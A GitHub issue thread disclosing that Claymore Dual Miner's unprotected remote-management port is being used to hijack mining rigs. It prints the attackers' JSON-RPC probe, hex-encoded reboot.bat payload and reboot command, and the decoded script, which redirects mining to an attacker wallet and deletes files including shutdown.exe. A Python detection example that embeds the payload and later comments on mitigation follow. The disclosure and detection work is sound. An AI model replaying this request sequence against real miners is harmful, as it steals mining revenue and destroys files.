nanopool / Claymore-Dual-Miner

Claymore's Dual Ethereum+Decred_Siacoin_Lbry AMD+NVIDIA GPU Miner
1.12k stars 276 forks

vuln #156

Closed anon4425 closed 6 years ago

anon4425 commented 6 years ago

There has been a huge intrusion in Claymore's Dual cryptographic miner. I am posting this to all who can possibly bring attention to this matter and get it fixed. This was originally sent to dwarfpool.com's

Hello, our services detected a massive number of commands being sent out from various IP addresses, with two different commands being sent on ports 3333, 80, 3001 and 9001. After further research we discovered that the above ports are the most commonly used for remote management (with Claymore's Dual Miner). The following are the commands that were sent out.

We believe this is the initial (first) command sent out via raw socket:

{"id":0,"jsonrpc":"2.0","method":"miner_getstat1"}

We think they send this out to a vast number of IPs in some sort of list that they made using a port scanner such as Zmap. After testing this out on our miners, the miner will reply with a message containing statistic data (hash rate, GPU count, temps etc.) for the remote manager built into Claymore's. I am certain this is purely used to filter out miner IPs from a range of other services running on the same port.

This command is sent to any IPs that have been "filtered"; this is basically the vulnerability:

{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["reboot.bat","7374617274202f42202222204574684463724d696e657236342e657865202d65706f6f6c206574682d7573322e6477617266706f6f6c2e636f6d3a38303038202d6577616c20307863333362353438443964656644383233463439304546393242394344623734393263643837394146202d6d6f64652031202d6d706f72742033333333202d6d70737720613870636b4d515533490d0a64656c202f46202f51204574684463724d696e657236342e6578650d0a64656c202f46202f5120636f6e6669672e7478740d0a64656c202f46202f51207265626f6f742e6261740d0a64656c202f46202f5120433a5c57696e646f77735c53797374656d33325c73687574646f776e2e657865"]}

The data is plain text but has simply been put through hex encoding; after reversing this it can be viewed as:

start /B "" EthDcrMiner64.exe -epool eth-us2.dwarfpool.com:8008 -ewal 0xc33b548D9defD823F490EF92B9CDb7492cd879AF -mode 1 -mport 3333 -mpsw a8pckMQU3I
del /F /Q EthDcrMiner64.exe
del /F /Q config.txt
del /F /Q reboot.bat
del /F /Q C:\Windows\System32\shutdown.exe

After looking into the Claymore miner, we discovered that this command will create a reboot.bat (a batch script for Windows machines) on any machine that has remote management enabled.

This command follows after the socket is closed and reconnected to. This will execute the above batch file, effectively hijacking it to the "hacker's wallet address":

{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}

We have tested this on two of our own rigs and it can be prevented easily by either closing the remote management port, or by removing the -mport, or by simply setting -mpsw.

This is a huge vulnerability that can result in lost revenue of thousands of dollars a day and possibly the devaluation of ETH, but it has a very simple fix.

I have attached a few text documents of all the miners I was able to find in less than 2 hours, using a simple Python script that I made in under 20 minutes.

If needed, I believe I can filter the list further to all of the vulnerable miners.

We hope you can bring attention to this vulnerability and get it fixed.

-Danny Flanders (0x2727DFfe8E31591bE3e7ebE7eA37A0D448432C4E) -mrfunnypickes@gmail.com

Attachment: Miners on port 3333.txt
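To make the three-message exchange above concrete, here is an added Python example (written for this page; it is not code from the report, the attached scripts, or the Claymore project). It decodes a captured miner_file payload, flags the miner_file-then-miner_reboot pattern in a capture of management-port traffic, and audits a miner command line for the -mport/-mpsw mitigation the report lists. The capture is constructed from the three requests quoted in the report (the hex body with its stray spaces removed); all function names are mine, and only the three methods named in the report are known to the classifier.

```python
"""Decode and detect the Claymore remote-management hijack sequence described above."""
import json
import re
from typing import Dict, List, Tuple

# Methods named in the report. miner_getstat1 only returns statistics; miner_file
# writes a file on the rig and miner_reboot runs reboot.bat. Any other method is
# reported as "unknown" rather than guessed at.
READ_ONLY_METHODS = {"miner_getstat1"}
WRITE_METHODS = {"miner_file", "miner_reboot"}

# Hex body from the report's miner_file request (constructed sample, spaces removed).
REBOOT_BAT_HEX = (
    "7374617274202f42202222204574684463724d696e657236342e657865202d65706f6f6c206574682d7573322e6477"
    "617266706f6f6c2e636f6d3a38303038202d6577616c20307863333362353438443964656644383233463439304546393242394"
    "344623734393263643837394146202d6d6f64652031202d6d706f72742033333333202d6d70737720613870636b4d515533490"
    "d0a64656c202f46202f51204574684463724d696e657236342e6578650d0a64656c202f46202f5120636f6e6669672e7478740d0"
    "a64656c202f46202f51207265626f6f742e6261740d0a64656c202f46202f5120433a5c57696e646f77735c53797374656d33325c73687574646f776e2e657865"
)

# Constructed capture: the three requests in the order the report says they arrive.
SAMPLE_CAPTURE = [
    '{"id":0,"jsonrpc":"2.0","method":"miner_getstat1"}',
    json.dumps({"id": 0, "jsonrpc": "2.0", "method": "miner_file",
                "params": ["reboot.bat", REBOOT_BAT_HEX]}),
    '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}',
]


def parse_request(line: str) -> dict:
    """Parse one JSON-RPC 2.0 request line as sent to the miner's -mport."""
    msg = json.loads(line)
    if msg.get("jsonrpc") != "2.0" or not isinstance(msg.get("method"), str):
        raise ValueError("not a JSON-RPC 2.0 request")
    return msg


def decode_miner_file(msg: dict) -> Tuple[str, List[str]]:
    """Return (filename, script lines) from a miner_file request.

    params[0] is the target filename and params[1] the hex-encoded file body;
    the captured body uses CRLF line endings, which are normalised away here."""
    if msg.get("method") != "miner_file":
        raise ValueError("not a miner_file request")
    name, hexbody = msg["params"]
    body = bytes.fromhex(hexbody).decode("ascii")
    return name, body.replace("\r\n", "\n").rstrip("\n").split("\n")


def classify(line: str) -> str:
    """'read' for statistics-only methods, 'write' for methods that change the rig."""
    method = parse_request(line)["method"]
    if method in WRITE_METHODS:
        return "write"
    if method in READ_ONLY_METHODS:
        return "read"
    return "unknown"


def analyze_capture(lines: List[str]) -> Dict:
    """Walk captured requests and flag the write-a-.bat-then-reboot hijack pattern.

    Also pulls the -ewal wallet and -epool pool out of any dropped script so the
    operator can see where the hash rate would be redirected."""
    report: Dict = {"files": {}, "rebooted": False, "wallet": None, "pool": None}
    for line in lines:
        msg = parse_request(line)
        if msg["method"] == "miner_file":
            name, script = decode_miner_file(msg)
            report["files"][name] = script
            for script_line in script:
                wallet = re.search(r"-ewal\s+(0x[0-9a-fA-F]{40})", script_line)
                pool = re.search(r"-epool\s+(\S+)", script_line)
                if wallet:
                    report["wallet"] = wallet.group(1)
                if pool:
                    report["pool"] = pool.group(1)
        elif msg["method"] == "miner_reboot":
            report["rebooted"] = True
    # The report's sequence: a reboot.bat is written, then miner_reboot executes it.
    report["hijack"] = report["rebooted"] and "reboot.bat" in report["files"]
    return report


def audit_cmdline(cmdline: str) -> str:
    """Check a miner command line against the mitigations listed in the report."""
    args = cmdline.split()
    if "-mport" not in args:
        # Assumption flagged, not verified here: the report says removing -mport
        # prevents the attack; confirm the miner's default before relying on that.
        return "unspecified: no -mport on the command line; verify the miner's default"
    if "-mpsw" in args:
        return "protected: -mport is set together with -mpsw"
    return "exposed: -mport is set without -mpsw"


if __name__ == "__main__":
    for req in SAMPLE_CAPTURE:
        print(classify(req), req[:60])
    print(json.dumps(analyze_capture(SAMPLE_CAPTURE), indent=2))
    print(audit_cmdline("EthDcrMiner64.exe -epool eth-us2.dwarfpool.com:8008 -ewal 0x00 -mport 3333"))
```

Run it against your own management-port capture (one JSON-RPC request per line) and anything classified as "write" from an address you do not control is the hijack in progress; the audit function is the quick check to run over every rig's start script.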

anon4425 commented 6 years ago

I will attach the scripts I wrote that I was able to get over 4GH/s on.

anon4425 commented 6 years ago

https://dwarfpool.com/eth/address?wallet=0xdbc8A253239c344942Cb89315A2eba75D2346250

This is the current wallet of a hijacker.

bobcate commented 6 years ago

Not a big deal, but it sure is a vulnerability. To prevent this, the command line option "-mport" can be used to control the monitoring/management behavior of the program's built-in remote manager. Also "-mpsw" is used to password protect the remote manager.

Now I understand what RTFM actually means...

anon4425 commented 6 years ago

I did not forget to read the manual; in fact I clearly specified that this could be fixed without a software update here: "We have tested this on two of our own rigs and it can be prevented easily by either closing the remote management port. Or by removing the -mport . Or by simply setting -mpsw"

All I was trying to do was bring attention to the fact that I know of 500 miners that are actively getting hijacked, because the owners failed to set a password after they enabled remote management. Yes, it is technically their fault, although Claymore should have made it so that if -mport is declared there has to be a password set, either by making it stay in read-only mode or by preventing the miner from running to get the operator's attention.

But when over 10 coins were outright stolen from miners, don't you think that the developer should fix it? Me being a software engineer, I can tell you that this is a simple fix that could easily be integrated into the next iteration of the program.

BTW here are the wallets I have seen being used to hijack miners:

https://dwarfpool.com/eth/address?wallet=0xc33b548D9defD823F490EF92B9CDb7492cd879AF
https://dwarfpool.com/eth/address?wallet=0x7a4F522BA8d420e66539De7d0439dE6600B397E7
https://dwarfpool.com/eth/address?wallet=0xdbc8A253239c344942Cb89315A2eba75D2346250
https://dwarfpool.com/eth/address?wallet=0x6bc813919b92b65f062b8f8aa7ed28c13af451d7

I can provide proof, but it is pretty clear they are used for illegitimate activities only. I will post the latest wallet that is actively being used to hijack miners once I pull the latest configs off some of the vulnerable miners.

The hash rate floats between 1-2GH/s and the most I have seen it at is around 4GH/s. Keep in mind I mine ETH with $6000 worth of hardware, and I have BIOS-modded my cards and undervolted, and I get about 500MH/s, so these "hackers" are hijacking $12000-48000 worth of mining equipment with a grand total cost to them of about $5 for a cheap VPS, which they can use to send the JSON commands to the miners and also scan for new ones.

So maybe you should pay a little more attention and read before responding.

bobcate commented 6 years ago

What's with the attitude? Sorry I missed the part where you stated what I thought you didn't state.

Roaders commented 6 years ago

Yeah, I was wondering what the overly aggressive attitude was for

nelenel commented 6 years ago

I just hope the commands actually work, because I've been trying to increase the intensity of the miner and so far the -ethi command (specified in the readme) does jack shit. If that command does nothing, who knows what other commands also do nothing.

In this case, if -mport didn't work, then this is a huge problem, because you'd be vulnerable when you think you're not.

anon4425 commented 6 years ago

The commands should be working; just make sure your flags are being called (-mport). Just because they are inside the config.txt does not mean they are being declared. Check your .bat to make sure it calls the correct configuration file, or you can simply enter your configuration after the EthDcrMiner64.exe; above in my original post is an example.

burkeblazer87 commented 6 years ago
Arinerron commented 6 years ago

Is this vulnerability actually fixed, or does it still exist? It would be a super simple patch.